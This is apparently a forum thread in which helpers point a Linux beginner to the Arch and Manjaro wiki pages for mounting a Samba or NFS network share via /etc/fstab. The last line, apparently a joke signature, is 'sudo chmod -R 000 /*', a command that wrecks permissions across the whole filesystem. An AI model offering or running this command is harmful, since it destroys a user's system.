I don't know what type of network sharing your NAS uses but samba is usually a good place to start https://wiki.archlinux.org/index.php/Samba

NFTS

I've tried reading it all but I'm brand new to linux so it's a bit brain melty

To expand on what @Sauron what getting at, you'd want to take a look at the information under the Client section on the wiki page they linked. Typically, you'd want to add a line entry in /etc/fstab which will automatically mount your share when your machine starts up.

If your network is using Samba/Windows file share, you'd want something like this: https://wiki.archlinux.org/index.php/Samba#As_mount_entry

Else if your share is using NFS (is that what you meant by "NFTS"?), then you'd do this: https://wiki.archlinux.org/index.php/NFS#Mount_using_/etc/fstab

Manjaro should come with the libraries required to mount both of these types of shares installed by default.

I assume you mean NTFS - that's the file system, not the network sharing method.

I just noticed you're using Manjaro, not Arch (though the title says otherwise) - in that case if it IS a samba share you should be able to see it in your file manager after following this (considerably shorter) guide on the manjaro wiki: https://wiki.manjaro.org/index.php?title=Using_Samba_in_your_File_Manager

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
